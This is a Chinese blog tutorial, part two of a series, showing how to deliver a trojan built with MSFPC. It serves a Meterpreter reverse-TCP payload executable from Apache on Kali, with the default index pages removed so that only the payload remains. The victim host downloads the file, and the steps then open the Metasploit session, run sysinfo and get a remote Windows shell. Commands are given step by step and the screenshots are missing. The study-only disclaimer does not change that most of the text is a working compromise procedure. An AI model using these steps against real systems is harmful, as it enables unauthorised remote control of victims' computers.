白帽子黑客与网络安全工程师教你:如何使用MSFPC半自动化生成强大的木码?【下集】

187 篇文章 10 订阅
173 篇文章 3 订阅

课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!

正文部分
三、战略安排
3.1 查看监听主机的apapche2状态,如下图所示。
命令:service apapche2 status
在这里插入图片描述

3.2 开启监听主机的apapche2主机,如下图所示。
命令:service apache2 start
在这里插入图片描述

3.3 将生成的“windows-meterpreter-staged-reverse-tcp-555.exe”文件复制到apapche2目录下,如下图所示。
命令:cp windows-meterpreter-staged-reverse-tcp-555.exe /var/www/html
在这里插入图片描述

3.4 删除“/var/www/html”目录下一些不相干的文件,只保留payload文件,如下图所示。
命令:rm /var/www/html/index.html
命令:rm /var/www/html/index.nginx-debian.html
在这里插入图片描述
在这里插入图片描述

3.5 查看“/var/www/html”目录下是否只存在payload文件,如下图所示。
命令:ls /var/www/html/
在这里插入图片描述

3.6 在物理机中访问处于监听状态下的kali linux主机,如下图所示。
在这里插入图片描述

3.7 将生成的payload文件下载到物理主机,如下图所示。
在这里插入图片描述

3.8 连接payload文件,如下图所示。
命令:msfconsole -q -r ‘/root/windows-meterpreter-staged-reverse-tcp-5555-exe.rc’
在这里插入图片描述
在这里插入图片描述

3.9 查看session信息,如下图所示。
命令:session -i 1
在这里插入图片描述
在这里插入图片描述

3.10 成功拿下目标主机,如下图所示,查看目标主机的系统信息。
命令:sysinfo
在这里插入图片描述

3.10.1 利用shell访问目标主机,如下图所示。
命令:shell
在这里插入图片描述

3.10.2 解决shell界面乱码问题,如下图所示。
chcp 65001
在这里插入图片描述
在这里插入图片描述

辛苦原创,你的每一次评论点赞和关注,都是我们源源不断的创作动力哦!你也可搜索:Kali 与编程,学习更多 Kali Linux 渗透与白帽编程技巧呢!
点我学习完整视频渗透课,预计更新1000节

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值